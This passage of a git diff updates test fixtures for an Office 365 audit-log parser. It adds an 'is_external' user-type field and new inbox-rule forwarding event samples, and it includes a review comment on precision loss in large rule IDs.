\"Platform\": \"Service\", \"Site\": \"582d798a-ba87-4a78-8792-87db9262b0a3\", \"UserAgent\": \"OneDriveMpc-Transform_Zip/1.0\", \"UserSessionId\": \"b332294a-fad5-45a0-8761-63922a2544bf\", \"WebId\": \"ead1e78b-1d0c-4251-920a-f4fb48fce5e2\", \"DeviceDisplayName\": \"5.6.7.8\", \"EventSignature\": \"SOME_SIGNATURE\", \"FileSizeBytes\": 26860827, \"HighPriorityMediaProcessing\": false, \"ListBaseType\": 1, \"ListServerTemplate\": 700, \"SourceFileExtension\": \"zip\", \"ZipFileName\": \"1.zip\", \"SiteUrl\": \"https://example.com/\", \"SourceRelativeUrl\": \"Documents/IMT MBA\", \"SourceFileName\": \"1.zip\", \"ApplicationDisplayName\": \"MeTA\", \"ObjectId\": \"https://example.com/1.zip\"}" + }, + "expected": { + "message": "{\"AppAccessContext\": {\"ClientAppName\": \"MeTA\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\"}, \"CreationTime\": \"2024-11-29T12:31:12\", \"Id\": \"609745a8-8ec0-4305-8607-fa95f45cf370\", \"Operation\": \"FileDownloaded\", \"OrganizationId\": 
\"eda474c4-ddfd-4ecd-85ff-3103a09b118d\", \"RecordType\": 6, \"UserKey\": \"urn:spo:guest:hash#aGVsbG8gdGhlcmUK\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"OneDrive\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"urn:spo:guest#john.doe@example.com\", \"AuthenticationType\": \"OAuth\", \"BrowserName\": \"\", \"BrowserVersion\": \"\", \"CorrelationId\": \"27de65c0-1c43-4d70-9a4d-45a66418dbd6\", \"DoNotDistributeEvent\": true, \"EventSource\": \"SharePoint\", \"GeoLocation\": \"EUR\", \"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"56391ee5-91aa-44f9-810e-a5dc47abbb02\", \"ListItemUniqueId\": \"1d91eda8-2918-42f0-8f2b-88dd9aaffcdf\", \"Platform\": \"Service\", \"Site\": \"582d798a-ba87-4a78-8792-87db9262b0a3\", \"UserAgent\": \"OneDriveMpc-Transform_Zip/1.0\", \"UserSessionId\": \"b332294a-fad5-45a0-8761-63922a2544bf\", \"WebId\": \"ead1e78b-1d0c-4251-920a-f4fb48fce5e2\", \"DeviceDisplayName\": \"5.6.7.8\", \"EventSignature\": \"SOME_SIGNATURE\", \"FileSizeBytes\": 26860827, \"HighPriorityMediaProcessing\": false, \"ListBaseType\": 1, \"ListServerTemplate\": 700, \"SourceFileExtension\": \"zip\", \"ZipFileName\": \"1.zip\", \"SiteUrl\": \"https://example.com/\", \"SourceRelativeUrl\": \"Documents/IMT MBA\", \"SourceFileName\": \"1.zip\", \"ApplicationDisplayName\": \"MeTA\", \"ObjectId\": \"https://example.com/1.zip\"}", + "event": { + "action": "FileDownloaded", + "category": [ + "file" + ], + "code": "6", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-29T12:31:12Z", + "action": { + "id": 6, + "name": "FileDownloaded", + "outcome": "success", + "properties": [ + { + "SiteUrl": "https://example.com/", + "SourceFileName": "1.zip", + "SourceRelativeUrl": "Documents/IMT MBA", + "UserAgent": "OneDriveMpc-Transform_Zip/1.0" + } + ], + "target": "user" + }, + "file": { + "directory": "Documents/IMT MBA", + "extension": "zip", + "name": "1.zip", + "size": 26860827 + }, + "office365": { + "audit": { + "object_id": 
"https://example.com/1.zip" + }, + "context": { + "client": { + "name": "MeTA" + }, + "correlation": { + "id": "27de65c0-1c43-4d70-9a4d-45a66418dbd6" + } + }, + "record_type": 6, + "user_type": { + "code": 0, + "is_external": true, + "name": "Regular" + } + }, + "organization": { + "id": "eda474c4-ddfd-4ecd-85ff-3103a09b118d" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@example.com" + ] + }, + "service": { + "name": "OneDrive" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "domain": "example.com", + "full": "https://example.com/1.zip", + "original": "https://example.com/1.zip", + "path": "/1.zip", + "port": 443, + "registered_domain": "example.com", + "scheme": "https", + "top_level_domain": "com" + }, + "user": { + "email": "john.doe@example.com", + "id": "urn:spo:guest:hash#aGVsbG8gdGhlcmUK", + "name": "john.doe@example.com" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "OneDriveMpc-Transform_Zip/1.0", + "os": { + "name": "Other" + } + } + } +} \ No newline at end of file diff --git a/Office 365/o365/tests/file_previewed.json b/Office 365/o365/tests/file_previewed.json index f5cd4e410..d3ce72283 100644 --- a/Office 365/o365/tests/file_previewed.json +++ b/Office 365/o365/tests/file_previewed.json @@ -42,6 +42,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_size.json b/Office 365/o365/tests/file_size.json index ea0339b0b..7c6c0446f 100644 --- a/Office 365/o365/tests/file_size.json +++ b/Office 365/o365/tests/file_size.json @@ -52,6 +52,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_sync_download_full.json b/Office 365/o365/tests/file_sync_download_full.json index 44dd5f6c3..159b72879 100644 --- a/Office 365/o365/tests/file_sync_download_full.json 
+++ b/Office 365/o365/tests/file_sync_download_full.json @@ -48,6 +48,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_visited.json b/Office 365/o365/tests/file_visited.json index 46855c741..44ee7180b 100644 --- a/Office 365/o365/tests/file_visited.json +++ b/Office 365/o365/tests/file_visited.json @@ -30,6 +30,7 @@ "result_status": "TRUE", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/form_log.json b/Office 365/o365/tests/form_log.json index 7fc38b1d5..affdbd3b0 100644 --- a/Office 365/o365/tests/form_log.json +++ b/Office 365/o365/tests/form_log.json @@ -28,6 +28,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/inbox_rule.json b/Office 365/o365/tests/inbox_rule.json index 8af518085..1c31e54e6 100644 --- a/Office 365/o365/tests/inbox_rule.json +++ b/Office 365/o365/tests/inbox_rule.json @@ -21,7 +21,10 @@ "object_id": "EURPR07A010.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/example.onmicrosoft.com/bc1b1df3-f861-4aec-bf7c-40ce5b5566c1\\RULE_NAME" }, "context": { - "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847" + "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847", + "client": { + "id": "00000002-0000-0ff1-ce00-000000000000" + } }, "exchange_admin": { "parameters": [ @@ -43,6 +46,7 @@ "result_status": "True", "user_type": { "code": 2, + "is_external": false, "name": "Admin" } }, diff --git a/Office 365/o365/tests/managed_sync.json b/Office 365/o365/tests/managed_sync.json index 4c860c040..9157cdb0a 100644 --- a/Office 365/o365/tests/managed_sync.json +++ b/Office 365/o365/tests/managed_sync.json @@ -38,6 +38,7 @@ "record_type": 4, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, 
diff --git a/Office 365/o365/tests/mass_download.json b/Office 365/o365/tests/mass_download.json index c072a45c4..d099f991b 100644 --- a/Office 365/o365/tests/mass_download.json +++ b/Office 365/o365/tests/mass_download.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/mcas_alert.json b/Office 365/o365/tests/mcas_alert.json index 91e13123f..0e7bbd829 100644 --- a/Office 365/o365/tests/mcas_alert.json +++ b/Office 365/o365/tests/mcas_alert.json @@ -41,6 +41,7 @@ "result_status": "New", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json index e1397f623..cf341ed7d 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json @@ -33,6 +33,7 @@ "record_type": 47, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json index 31948758b..ef016aff1 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json @@ -114,6 +114,7 @@ "record_type": 28, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json index 59fdd35ce..fd5c01c5f 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json 
@@ -21,6 +21,7 @@ "record_type": 41, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json new file mode 100644 index 000000000..27d256630 --- /dev/null +++ b/Office 365/o365/tests/operation_properties_01.json 
@@ -0,0 +1,92 @@ +{ + "input": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + } + }, + "expected": { + "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "event": { + "action": "UpdateInboxRules", + "category": [ + "email", + "file" + ], + "code": "2", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T10:34:13Z", + "action": { + "id": 2, + "name": "UpdateInboxRules", + "outcome": "success", + "target": "user" + 
}, + "office365": { + "context": { + "aad_session_id": "xxxx-xxx-xxx-xxxx" + }, + "exchange": { + "mailbox_guid": "xxxx-xxx-xxx-xxxx" + }, + "operation": { + "properties": { + "RuleActions": [ + { + "ActionType": "Forward", + "ForwardFlags": "None", + "Recipients": [ + "john.doe@mail.fr", + "user@email.fr", + "asmithee@mailbox.fr", + "user.name@mail.fr" + ] + } + ], + "RuleCondition": "{(Exists(ItemClass))}", + "RuleId": -123, + "RuleOperation": "ModifyMailboxRule", + "RuleProvider": "RuleOrganizer", + "RuleState": "Enabled" + } + }, + "record_type": 2, + "result_status": "Succeeded", + "user_type": { + "code": 0, + "is_external": false, + "name": "Regular" + } + }, + "organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@mail.fr", + "id": "S-1-2-3-4", + "name": "john.doe@mail.fr" + } + } +} \ No newline at end of file diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json new file mode 100644 index 000000000..6d50c87eb --- /dev/null +++ b/Office 365/o365/tests/operation_properties_02.json 
@@ -0,0 +1,89 @@ +{ + "input": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + } + }, + "expected": { + "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "event": { + "action": "UpdateInboxRules", + "category": [ + "email", + "file" + ], + "code": "2", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-23T12:26:18Z", + "action": { + "id": 2, + "name": 
"UpdateInboxRules", + "outcome": "success", + "target": "user" + }, + "office365": { + "context": { + "aad_session_id": "xxxx-xxx-xxx-xxxx" + }, + "exchange": { + "mailbox_guid": "xxxx-xxx-xxx-xxxx" + }, + "operation": { + "properties": { + "RuleActions": [ + { + "ActionType": "Forward", + "ForwardFlags": "None", + "Recipients": [ + "user.name@mail.fr" + ] + } + ], + "RuleCondition": "{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}", + "RuleId": 4561233110666051585, + "RuleOperation": "ModifyMailboxRule", + "RuleProvider": "RuleOrganizer", + "RuleState": "Enabled" + } + }, + "record_type": 2, + "result_status": "Succeeded", + "user_type": { + "code": 0, + "is_external": false, + "name": "Regular" + } + }, + "organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@mail.fr", + "id": "S-1-2-3", + "name": "john.doe@mail.fr" + } + } +} \ No newline at end of file diff --git a/Office 365/o365/tests/power_bi.json b/Office 365/o365/tests/power_bi.json index 04a388971..186958235 100644 --- a/Office 365/o365/tests/power_bi.json +++ b/Office 365/o365/tests/power_bi.json @@ -23,6 +23,7 @@ "record_type": 20, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/remove_member_from_role.json b/Office 365/o365/tests/remove_member_from_role.json index 5feefc067..cd39a1c92 100644 --- a/Office 365/o365/tests/remove_member_from_role.json +++ b/Office 365/o365/tests/remove_member_from_role.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, 
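Review bot: The expected block pins `"RuleId": 4561233110666051585` as a JSON number although the source event carries it as the string `"4561233110666051585"`; that value is above 2^53, so any consumer that decodes JSON numbers as IEEE-754 doubles will silently round it and the rule can no longer be matched by id across events. Keep the identifier a string in the fixture, `"RuleId": "4561233110666051585",`, and have the parser (presumably where the conversion happens; it is not in this chunk) preserve the source type. The previous fixture shows the same conversion with `"RuleId": -123`, where it is harmless but equally inconsistent with the input.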
diff --git a/Office 365/o365/tests/security_compliance_alert.json b/Office 365/o365/tests/security_compliance_alert.json index 9988fb1fe..f3d73bb7d 100644 --- a/Office 365/o365/tests/security_compliance_alert.json +++ b/Office 365/o365/tests/security_compliance_alert.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_2.json b/Office 365/o365/tests/security_compliance_alert_2.json index 43cac929e..b52c6c789 100644 --- a/Office 365/o365/tests/security_compliance_alert_2.json +++ b/Office 365/o365/tests/security_compliance_alert_2.json @@ -65,6 +65,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_3.json b/Office 365/o365/tests/security_compliance_alert_3.json index 4a695584b..693cae46a 100644 --- a/Office 365/o365/tests/security_compliance_alert_3.json +++ b/Office 365/o365/tests/security_compliance_alert_3.json @@ -60,6 +60,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_4.json b/Office 365/o365/tests/security_compliance_alert_4.json index a6b83cc30..33fb22e5d 100644 --- a/Office 365/o365/tests/security_compliance_alert_4.json +++ b/Office 365/o365/tests/security_compliance_alert_4.json @@ -59,6 +59,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_5.json b/Office 365/o365/tests/security_compliance_alert_5.json index f0e153b7e..517d9efea 100644 --- a/Office 365/o365/tests/security_compliance_alert_5.json +++ b/Office 365/o365/tests/security_compliance_alert_5.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, 
diff --git a/Office 365/o365/tests/security_compliance_alert_7.json b/Office 365/o365/tests/security_compliance_alert_7.json index 0775bbdc8..062affbb5 100644 --- a/Office 365/o365/tests/security_compliance_alert_7.json +++ b/Office 365/o365/tests/security_compliance_alert_7.json @@ -60,6 +60,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_malicious_url.json b/Office 365/o365/tests/security_compliance_alert_malicious_url.json index 7bb99fa1d..43e51bb06 100644 --- a/Office 365/o365/tests/security_compliance_alert_malicious_url.json +++ b/Office 365/o365/tests/security_compliance_alert_malicious_url.json @@ -53,6 +53,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/source_log.json b/Office 365/o365/tests/source_log.json index 95ecbad6c..488df5065 100644 --- a/Office 365/o365/tests/source_log.json +++ b/Office 365/o365/tests/source_log.json @@ -48,6 +48,7 @@ "record_type": 14, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/targetusername.json b/Office 365/o365/tests/targetusername.json index ec3137b79..f881d49d9 100644 --- a/Office 365/o365/tests/targetusername.json +++ b/Office 365/o365/tests/targetusername.json @@ -58,6 +58,7 @@ "record_type": 14, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_message_has_link.json b/Office 365/o365/tests/teams_message_has_link.json index cbb5caa76..03b584a02 100644 --- a/Office 365/o365/tests/teams_message_has_link.json +++ b/Office 365/o365/tests/teams_message_has_link.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, 
diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users.json b/Office 365/o365/tests/teams_with_foreign_tenant_users.json index 5b1e6802d..83f3436b7 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users.json +++ b/Office 365/o365/tests/teams_with_foreign_tenant_users.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json b/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json index fed58f479..ecbdcb18f 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json +++ b/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json @@ -44,6 +44,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json b/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json index 727b939ce..34e139dff 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json +++ b/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json @@ -44,6 +44,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_without_foreign_tenant_users.json b/Office 365/o365/tests/teams_without_foreign_tenant_users.json index e22534f43..82ca31d6c 100644 --- a/Office 365/o365/tests/teams_without_foreign_tenant_users.json +++ b/Office 365/o365/tests/teams_without_foreign_tenant_users.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/threat_intel.json b/Office 365/o365/tests/threat_intel.json index f2bd901be..3b4c44e60 100644 --- a/Office 365/o365/tests/threat_intel.json +++ b/Office 365/o365/tests/threat_intel.json @@ -33,6 +33,7 @@ "record_type": 47, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, 
diff --git a/Office 365/o365/tests/update_group.json b/Office 365/o365/tests/update_group.json index 20ba82d4d..7bd2bc5a7 100644 --- a/Office 365/o365/tests/update_group.json +++ b/Office 365/o365/tests/update_group.json @@ -30,6 +30,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/update_user.json b/Office 365/o365/tests/update_user.json index b8b43939e..268397a3f 100644 --- a/Office 365/o365/tests/update_user.json +++ b/Office 365/o365/tests/update_user.json @@ -30,6 +30,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/update_user_empty_source_ip.json b/Office 365/o365/tests/update_user_empty_source_ip.json index cd658f9a4..22759d202 100644 --- a/Office 365/o365/tests/update_user_empty_source_ip.json +++ b/Office 365/o365/tests/update_user_empty_source_ip.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_logged_in.json b/Office 365/o365/tests/user_logged_in.json index 1cb5385fb..f982e5996 100644 --- a/Office 365/o365/tests/user_logged_in.json +++ b/Office 365/o365/tests/user_logged_in.json @@ -44,6 +44,7 @@ 